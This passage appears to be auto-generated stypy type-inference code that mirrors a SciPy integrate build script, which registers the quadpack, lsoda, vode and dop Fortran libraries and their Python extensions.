add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 31, 29), list_32155, join_call_result_32160)
# Assigning a type to the variable 'odeint_banded_test_src' (line 31)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 31, 4), 'odeint_banded_test_src', list_32155)
# Call to add_library(...): (line 33)
# Processing the call arguments (line 33)
str_32163 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 33, 23), 'str', 'mach')
# Processing the call keyword arguments (line 33)
# Getting the type of 'mach_src' (line 33)
mach_src_32164 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 33, 39), 'mach_src', False)
keyword_32165 = mach_src_32164
# Obtaining an instance of the builtin type 'dict' (line 34)
dict_32166 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 33), 'dict')
# Adding type elements to the builtin type 'dict' instance (line 34)
# Adding element type (key, value) (line 34)
str_32167 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 34), 'str', 'noopt')
# Obtaining an instance of the builtin type 'tuple' (line 34)
tuple_32168 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 43), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 34)
# Adding element type (line 34)
# Getting the type of '__file__' (line 34)
file___32169 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 34, 43), '__file__', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 34, 43), tuple_32168, file___32169)
# Adding element type (line 34)
int_32170 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 52), 'int')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 34, 43), tuple_32168, int_32170)
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 34, 33), dict_32166, (str_32167, tuple_32168))
keyword_32171 = dict_32166
kwargs_32172 = {'sources': keyword_32165, 'config_fc': keyword_32171}
# Getting the type of 'config' (line 33)
config_32161 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 33, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 33)
add_library_32162 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 33, 4), config_32161, 'add_library')
# Calling add_library(args, kwargs) (line 33)
add_library_call_result_32173 = invoke(stypy.reporting.localization.Localization(__file__, 33, 4), add_library_32162, *[str_32163], **kwargs_32172)
# Call to add_library(...): (line 35)
# Processing the call arguments (line 35)
str_32176 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 35, 23), 'str', 'quadpack')
# Processing the call keyword arguments (line 35)
# Getting the type of 'quadpack_src' (line 35)
quadpack_src_32177 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 43), 'quadpack_src', False)
keyword_32178 = quadpack_src_32177
kwargs_32179 = {'sources': keyword_32178}
# Getting the type of 'config' (line 35)
config_32174 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 35)
add_library_32175 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 35, 4), config_32174, 'add_library')
# Calling add_library(args, kwargs) (line 35)
add_library_call_result_32180 = invoke(stypy.reporting.localization.Localization(__file__, 35, 4), add_library_32175, *[str_32176], **kwargs_32179)
# Call to add_library(...): (line 36)
# Processing the call arguments (line 36)
str_32183 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 36, 23), 'str', 'lsoda')
# Processing the call keyword arguments (line 36)
# Getting the type of 'lsoda_src' (line 36)
lsoda_src_32184 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 40), 'lsoda_src', False)
keyword_32185 = lsoda_src_32184
kwargs_32186 = {'sources': keyword_32185}
# Getting the type of 'config' (line 36)
config_32181 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 36)
add_library_32182 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 36, 4), config_32181, 'add_library')
# Calling add_library(args, kwargs) (line 36)
add_library_call_result_32187 = invoke(stypy.reporting.localization.Localization(__file__, 36, 4), add_library_32182, *[str_32183], **kwargs_32186)
# Call to add_library(...): (line 37)
# Processing the call arguments (line 37)
str_32190 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 37, 23), 'str', 'vode')
# Processing the call keyword arguments (line 37)
# Getting the type of 'vode_src' (line 37)
vode_src_32191 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 39), 'vode_src', False)
keyword_32192 = vode_src_32191
kwargs_32193 = {'sources': keyword_32192}
# Getting the type of 'config' (line 37)
config_32188 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 37)
add_library_32189 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 37, 4), config_32188, 'add_library')
# Calling add_library(args, kwargs) (line 37)
add_library_call_result_32194 = invoke(stypy.reporting.localization.Localization(__file__, 37, 4), add_library_32189, *[str_32190], **kwargs_32193)
# Call to add_library(...): (line 38)
# Processing the call arguments (line 38)
str_32197 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 38, 23), 'str', 'dop')
# Processing the call keyword arguments (line 38)
# Getting the type of 'dop_src' (line 38)
dop_src_32198 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 38, 38), 'dop_src', False)
keyword_32199 = dop_src_32198
kwargs_32200 = {'sources': keyword_32199}
# Getting the type of 'config' (line 38)
config_32195 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 38, 4), 'config', False)
# Obtaining the member 'add_library' of a type (line 38)
add_library_32196 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 38, 4), config_32195, 'add_library')
# Calling add_library(args, kwargs) (line 38)
add_library_call_result_32201 = invoke(stypy.reporting.localization.Localization(__file__, 38, 4), add_library_32196, *[str_32197], **kwargs_32200)
# Assigning a List to a Name (line 42):
# Obtaining an instance of the builtin type 'list' (line 42)
list_32202 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 19), 'list')
# Adding type elements to the builtin type 'list' instance (line 42)
# Adding element type (line 42)
# Call to join(...): (line 42)
# Processing the call arguments (line 42)
# Call to dirname(...): (line 42)
# Processing the call arguments (line 42)
# Getting the type of '__file__' (line 42)
file___32207 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 42, 41), '__file__', False)
# Processing the call keyword arguments (line 42)
kwargs_32208 = {}
# Getting the type of 'os' (line 42)
os_32204 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 42, 25), 'os', False)
# Obtaining the member 'path' of a type (line 42)
path_32205 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 42, 25), os_32204, 'path')
# Obtaining the member 'dirname' of a type (line 42)
dirname_32206 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 42, 25), path_32205, 'dirname')
# Calling dirname(args, kwargs) (line 42)
dirname_call_result_32209 = invoke(stypy.reporting.localization.Localization(__file__, 42, 25), dirname_32206, *[file___32207], **kwargs_32208)
str_32210 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 52), 'str', '..')
str_32211 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 58), 'str', '_lib')
str_32212 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 42, 66), 'str', 'src')
# Processing the call keyword arguments (line 42)
kwargs_32213 = {}
# Getting the type of 'join' (line 42)
join_32203 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 42, 20), 'join', False)
# Calling join(args, kwargs) (line 42)
join_call_result_32214 = invoke(stypy.reporting.localization.Localization(__file__, 42, 20), join_32203, *[dirname_call_result_32209, str_32210, str_32211, str_32212], **kwargs_32213)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 42, 19), list_32202, join_call_result_32214)
# Assigning a type to the variable 'include_dirs' (line 42)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 42, 4), 'include_dirs', list_32202)
str_32215 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 43, 7), 'str', 'include_dirs')
# Getting the type of 'lapack_opt' (line 43)
lapack_opt_32216 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 25), 'lapack_opt')
# Applying the binary operator 'in' (line 43)
result_contains_32217 = python_operator(stypy.reporting.localization.Localization(__file__, 43, 7), 'in', str_32215, lapack_opt_32216)
# Testing the type of an if condition (line 43)
if_condition_32218 = is_suitable_condition(stypy.reporting.localization.Localization(__file__, 43, 4), result_contains_32217)
# Assigning a type to the variable 'if_condition_32218' (line 43)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 43, 4), 'if_condition_32218', if_condition_32218)
# SSA begins for if statement (line 43)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'if')
# Assigning a Call to a Name (line 44):
# Call to dict(...): (line 44)
# Processing the call arguments (line 44)
# Getting the type of 'lapack_opt' (line 44)
lapack_opt_32220 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 26), 'lapack_opt', False)
# Processing the call keyword arguments (line 44)
kwargs_32221 = {}
# Getting the type of 'dict' (line 44)
dict_32219 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 21), 'dict', False)
# Calling dict(args, kwargs) (line 44)
dict_call_result_32222 = invoke(stypy.reporting.localization.Localization(__file__, 44, 21), dict_32219, *[lapack_opt_32220], **kwargs_32221)
# Assigning a type to the variable 'lapack_opt' (line 44)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 44, 8), 'lapack_opt', dict_call_result_32222)
# Call to extend(...): (line 45)
# Processing the call arguments (line 45)
# Call to pop(...): (line 45)
# Processing the call arguments (line 45)
str_32227 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 45, 43), 'str', 'include_dirs')
# Processing the call keyword arguments (line 45)
kwargs_32228 = {}
# Getting the type of 'lapack_opt' (line 45)
lapack_opt_32225 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 45, 28), 'lapack_opt', False)
# Obtaining the member 'pop' of a type (line 45)
pop_32226 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 45, 28), lapack_opt_32225, 'pop')
# Calling pop(args, kwargs) (line 45)
pop_call_result_32229 = invoke(stypy.reporting.localization.Localization(__file__, 45, 28), pop_32226, *[str_32227], **kwargs_32228)
# Processing the call keyword arguments (line 45)
kwargs_32230 = {}
# Getting the type of 'include_dirs' (line 45)
include_dirs_32223 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 45, 8), 'include_dirs', False)
# Obtaining the member 'extend' of a type (line 45)
extend_32224 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 45, 8), include_dirs_32223, 'extend')
# Calling extend(args, kwargs) (line 45)
extend_call_result_32231 = invoke(stypy.reporting.localization.Localization(__file__, 45, 8), extend_32224, *[pop_call_result_32229], **kwargs_32230)
# SSA join for if statement (line 43)
module_type_store = module_type_store.join_ssa_context()
# Call to add_extension(...): (line 47)
# Processing the call arguments (line 47)
str_32234 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 47, 25), 'str', '_quadpack')
# Processing the call keyword arguments (line 47)
# Obtaining an instance of the builtin type 'list' (line 48)
list_32235 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 48, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 48)
# Adding element type (line 48)
str_32236 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 48, 34), 'str', '_quadpackmodule.c')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 48, 33), list_32235, str_32236)
keyword_32237 = list_32235
# Obtaining an instance of the builtin type 'list' (line 49)
list_32238 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 49)
# Adding element type (line 49)
str_32239 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 36), 'str', 'quadpack')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 49, 35), list_32238, str_32239)
# Adding element type (line 49)
str_32240 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 48), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 49, 35), list_32238, str_32240)
# Getting the type of 'lapack_libs' (line 49)
lapack_libs_32241 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 49, 58), 'lapack_libs', False)
# Applying the binary operator '+' (line 49)
result_add_32242 = python_operator(stypy.reporting.localization.Localization(__file__, 49, 35), '+', list_32238, lapack_libs_32241)
keyword_32243 = result_add_32242
# Obtaining an instance of the builtin type 'list' (line 50)
list_32244 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 50, 34), 'list')
# Adding type elements to the builtin type 'list' instance (line 50)
# Adding element type (line 50)
str_32245 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 50, 35), 'str', '__quadpack.h')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 50, 34), list_32244, str_32245)
# Getting the type of 'quadpack_src' (line 51)
quadpack_src_32246 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 36), 'quadpack_src', False)
# Applying the binary operator '+' (line 50)
result_add_32247 = python_operator(stypy.reporting.localization.Localization(__file__, 50, 34), '+', list_32244, quadpack_src_32246)
# Getting the type of 'mach_src' (line 51)
mach_src_32248 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 51), 'mach_src', False)
# Applying the binary operator '+' (line 51)
result_add_32249 = python_operator(stypy.reporting.localization.Localization(__file__, 51, 49), '+', result_add_32247, mach_src_32248)
keyword_32250 = result_add_32249
# Getting the type of 'include_dirs' (line 52)
include_dirs_32251 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 52, 38), 'include_dirs', False)
keyword_32252 = include_dirs_32251
# Getting the type of 'lapack_opt' (line 53)
lapack_opt_32253 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 53, 27), 'lapack_opt', False)
kwargs_32254 = {'libraries': keyword_32243, 'sources': keyword_32237, 'depends': keyword_32250, 'lapack_opt_32253': lapack_opt_32253, 'include_dirs': keyword_32252}
# Getting the type of 'config' (line 47)
config_32232 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 47, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 47)
add_extension_32233 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 47, 4), config_32232, 'add_extension')
# Calling add_extension(args, kwargs) (line 47)
add_extension_call_result_32255 = invoke(stypy.reporting.localization.Localization(__file__, 47, 4), add_extension_32233, *[str_32234], **kwargs_32254)
# Assigning a Call to a Name (line 56):
# Call to copy(...): (line 56)
# Processing the call keyword arguments (line 56)
kwargs_32258 = {}
# Getting the type of 'lapack_opt' (line 56)
lapack_opt_32256 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 56, 19), 'lapack_opt', False)
# Obtaining the member 'copy' of a type (line 56)
copy_32257 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 56, 19), lapack_opt_32256, 'copy')
# Calling copy(args, kwargs) (line 56)
copy_call_result_32259 = invoke(stypy.reporting.localization.Localization(__file__, 56, 19), copy_32257, *[], **kwargs_32258)
# Assigning a type to the variable 'odepack_opts' (line 56)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 56, 4), 'odepack_opts', copy_call_result_32259)
# Call to update(...): (line 57)
# Processing the call arguments (line 57)
# Getting the type of 'numpy_nodepr_api' (line 57)
numpy_nodepr_api_32262 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 57, 24), 'numpy_nodepr_api', False)
# Processing the call keyword arguments (line 57)
kwargs_32263 = {}
# Getting the type of 'odepack_opts' (line 57)
odepack_opts_32260 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 57, 4), 'odepack_opts', False)
# Obtaining the member 'update' of a type (line 57)
update_32261 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 57, 4), odepack_opts_32260, 'update')
# Calling update(args, kwargs) (line 57)
update_call_result_32264 = invoke(stypy.reporting.localization.Localization(__file__, 57, 4), update_32261, *[numpy_nodepr_api_32262], **kwargs_32263)
# Call to add_extension(...): (line 58)
# Processing the call arguments (line 58)
str_32267 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 58, 25), 'str', '_odepack')
# Processing the call keyword arguments (line 58)
# Obtaining an instance of the builtin type 'list' (line 59)
list_32268 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 59, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 59)
# Adding element type (line 59)
str_32269 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 59, 34), 'str', '_odepackmodule.c')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 59, 33), list_32268, str_32269)
keyword_32270 = list_32268
# Obtaining an instance of the builtin type 'list' (line 60)
list_32271 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 60, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 60)
# Adding element type (line 60)
str_32272 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 60, 36), 'str', 'lsoda')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 60, 35), list_32271, str_32272)
# Adding element type (line 60)
str_32273 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 60, 45), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 60, 35), list_32271, str_32273)
# Getting the type of 'lapack_libs' (line 60)
lapack_libs_32274 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 60, 55), 'lapack_libs', False)
# Applying the binary operator '+' (line 60)
result_add_32275 = python_operator(stypy.reporting.localization.Localization(__file__, 60, 35), '+', list_32271, lapack_libs_32274)
keyword_32276 = result_add_32275
# Getting the type of 'lsoda_src' (line 61)
lsoda_src_32277 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 61, 34), 'lsoda_src', False)
# Getting the type of 'mach_src' (line 61)
mach_src_32278 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 61, 46), 'mach_src', False)
# Applying the binary operator '+' (line 61)
result_add_32279 = python_operator(stypy.reporting.localization.Localization(__file__, 61, 34), '+', lsoda_src_32277, mach_src_32278)
keyword_32280 = result_add_32279
# Getting the type of 'odepack_opts' (line 62)
odepack_opts_32281 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 62, 27), 'odepack_opts', False)
kwargs_32282 = {'libraries': keyword_32276, 'sources': keyword_32270, 'depends': keyword_32280, 'odepack_opts_32281': odepack_opts_32281}
# Getting the type of 'config' (line 58)
config_32265 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 58)
add_extension_32266 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 58, 4), config_32265, 'add_extension')
# Calling add_extension(args, kwargs) (line 58)
add_extension_call_result_32283 = invoke(stypy.reporting.localization.Localization(__file__, 58, 4), add_extension_32266, *[str_32267], **kwargs_32282)
# Call to add_extension(...): (line 65)
# Processing the call arguments (line 65)
str_32286 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 65, 25), 'str', 'vode')
# Processing the call keyword arguments (line 65)
# Obtaining an instance of the builtin type 'list' (line 66)
list_32287 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 66, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 66)
# Adding element type (line 66)
str_32288 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 66, 34), 'str', 'vode.pyf')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 66, 33), list_32287, str_32288)
keyword_32289 = list_32287
# Obtaining an instance of the builtin type 'list' (line 67)
list_32290 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 67, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 67)
# Adding element type (line 67)
str_32291 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 67, 36), 'str', 'vode')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 67, 35), list_32290, str_32291)
# Getting the type of 'lapack_libs' (line 67)
lapack_libs_32292 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 67, 46), 'lapack_libs', False)
# Applying the binary operator '+' (line 67)
result_add_32293 = python_operator(stypy.reporting.localization.Localization(__file__, 67, 35), '+', list_32290, lapack_libs_32292)
keyword_32294 = result_add_32293
# Getting the type of 'vode_src' (line 68)
vode_src_32295 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 68, 33), 'vode_src', False)
keyword_32296 = vode_src_32295
# Getting the type of 'lapack_opt' (line 69)
lapack_opt_32297 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 69, 27), 'lapack_opt', False)
kwargs_32298 = {'libraries': keyword_32294, 'sources': keyword_32289, 'depends': keyword_32296, 'lapack_opt_32297': lapack_opt_32297}
# Getting the type of 'config' (line 65)
config_32284 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 65, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 65)
add_extension_32285 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 65, 4), config_32284, 'add_extension')
# Calling add_extension(args, kwargs) (line 65)
add_extension_call_result_32299 = invoke(stypy.reporting.localization.Localization(__file__, 65, 4), add_extension_32285, *[str_32286], **kwargs_32298)
# Call to add_extension(...): (line 72)
# Processing the call arguments (line 72)
str_32302 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 72, 25), 'str', 'lsoda')
# Processing the call keyword arguments (line 72)
# Obtaining an instance of the builtin type 'list' (line 73)
list_32303 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 73, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 73)
# Adding element type (line 73)
str_32304 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 73, 34), 'str', 'lsoda.pyf')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 73, 33), list_32303, str_32304)
keyword_32305 = list_32303
# Obtaining an instance of the builtin type 'list' (line 74)
list_32306 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 74, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 74)
# Adding element type (line 74)
str_32307 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 74, 36), 'str', 'lsoda')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 74, 35), list_32306, str_32307)
# Adding element type (line 74)
str_32308 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 74, 45), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 74, 35), list_32306, str_32308)
# Getting the type of 'lapack_libs' (line 74)
lapack_libs_32309 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 74, 55), 'lapack_libs', False)
# Applying the binary operator '+' (line 74)
result_add_32310 = python_operator(stypy.reporting.localization.Localization(__file__, 74, 35), '+', list_32306, lapack_libs_32309)
keyword_32311 = result_add_32310
# Getting the type of 'lsoda_src' (line 75)
lsoda_src_32312 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 75, 34), 'lsoda_src', False)
# Getting the type of 'mach_src' (line 75)
mach_src_32313 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 75, 46), 'mach_src', False)
# Applying the binary operator '+' (line 75)
result_add_32314 = python_operator(stypy.reporting.localization.Localization(__file__, 75, 34), '+', lsoda_src_32312, mach_src_32313)
keyword_32315 = result_add_32314
# Getting the type of 'lapack_opt' (line 76)
lapack_opt_32316 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 76, 27), 'lapack_opt', False)
kwargs_32317 = {'libraries': keyword_32311, 'sources': keyword_32305, 'depends': keyword_32315, 'lapack_opt_32316': lapack_opt_32316}
# Getting the type of 'config' (line 72)
config_32300 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 72, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 72)
add_extension_32301 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 72, 4), config_32300, 'add_extension')
# Calling add_extension(args, kwargs) (line 72)
add_extension_call_result_32318 = invoke(stypy.reporting.localization.Localization(__file__, 72, 4), add_extension_32301, *[str_32302], **kwargs_32317)
# Call to add_extension(...): (line 79)
# Processing the call arguments (line 79)
str_32321 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 79, 25), 'str', '_dop')
# Processing the call keyword arguments (line 79)
# Obtaining an instance of the builtin type 'list' (line 80)
list_32322 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 80, 33), 'list')
# Adding type elements to the builtin type 'list' instance (line 80)
# Adding element type (line 80)
str_32323 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 80, 34), 'str', 'dop.pyf')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 80, 33), list_32322, str_32323)
keyword_32324 = list_32322
# Obtaining an instance of the builtin type 'list' (line 81)
list_32325 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 81, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 81)
# Adding element type (line 81)
str_32326 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 81, 36), 'str', 'dop')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 81, 35), list_32325, str_32326)
keyword_32327 = list_32325
# Getting the type of 'dop_src' (line 82)
dop_src_32328 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 82, 33), 'dop_src', False)
keyword_32329 = dop_src_32328
kwargs_32330 = {'libraries': keyword_32327, 'sources': keyword_32324, 'depends': keyword_32329}
# Getting the type of 'config' (line 79)
config_32319 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 79, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 79)
add_extension_32320 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 79, 4), config_32319, 'add_extension')
# Calling add_extension(args, kwargs) (line 79)
add_extension_call_result_32331 = invoke(stypy.reporting.localization.Localization(__file__, 79, 4), add_extension_32320, *[str_32321], **kwargs_32330)
# Call to add_extension(...): (line 84)
# Processing the call arguments (line 84)
str_32334 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 84, 25), 'str', '_test_multivariate')
# Processing the call keyword arguments (line 84)
# Getting the type of 'quadpack_test_src' (line 85)
quadpack_test_src_32335 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 85, 33), 'quadpack_test_src', False)
keyword_32336 = quadpack_test_src_32335
kwargs_32337 = {'sources': keyword_32336}
# Getting the type of 'config' (line 84)
config_32332 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 84, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 84)
add_extension_32333 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 84, 4), config_32332, 'add_extension')
# Calling add_extension(args, kwargs) (line 84)
add_extension_call_result_32338 = invoke(stypy.reporting.localization.Localization(__file__, 84, 4), add_extension_32333, *[str_32334], **kwargs_32337)
# Call to add_extension(...): (line 88)
# Processing the call arguments (line 88)
str_32341 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 88, 25), 'str', '_test_odeint_banded')
# Processing the call keyword arguments (line 88)
# Getting the type of 'odeint_banded_test_src' (line 89)
odeint_banded_test_src_32342 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 89, 33), 'odeint_banded_test_src', False)
keyword_32343 = odeint_banded_test_src_32342
# Obtaining an instance of the builtin type 'list' (line 90)
list_32344 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 90, 35), 'list')
# Adding type elements to the builtin type 'list' instance (line 90)
# Adding element type (line 90)
str_32345 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 90, 36), 'str', 'lsoda')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 90, 35), list_32344, str_32345)
# Adding element type (line 90)
str_32346 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 90, 45), 'str', 'mach')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 90, 35), list_32344, str_32346)
# Getting the type of 'lapack_libs' (line 90)
lapack_libs_32347 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 90, 55), 'lapack_libs', False)
# Applying the binary operator '+' (line 90)
result_add_32348 = python_operator(stypy.reporting.localization.Localization(__file__, 90, 35), '+', list_32344, lapack_libs_32347)
keyword_32349 = result_add_32348
# Getting the type of 'lsoda_src' (line 91)
lsoda_src_32350 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 91, 34), 'lsoda_src', False)
# Getting the type of 'mach_src' (line 91)
mach_src_32351 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 91, 46), 'mach_src', False)
# Applying the binary operator '+' (line 91)
result_add_32352 = python_operator(stypy.reporting.localization.Localization(__file__, 91, 34), '+', lsoda_src_32350, mach_src_32351)
keyword_32353 = result_add_32352
# Getting the type of 'lapack_opt' (line 92)
lapack_opt_32354 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 92, 27), 'lapack_opt', False)
kwargs_32355 = {'libraries': keyword_32349, 'sources': keyword_32343, 'depends': keyword_32353, 'lapack_opt_32354': lapack_opt_32354}
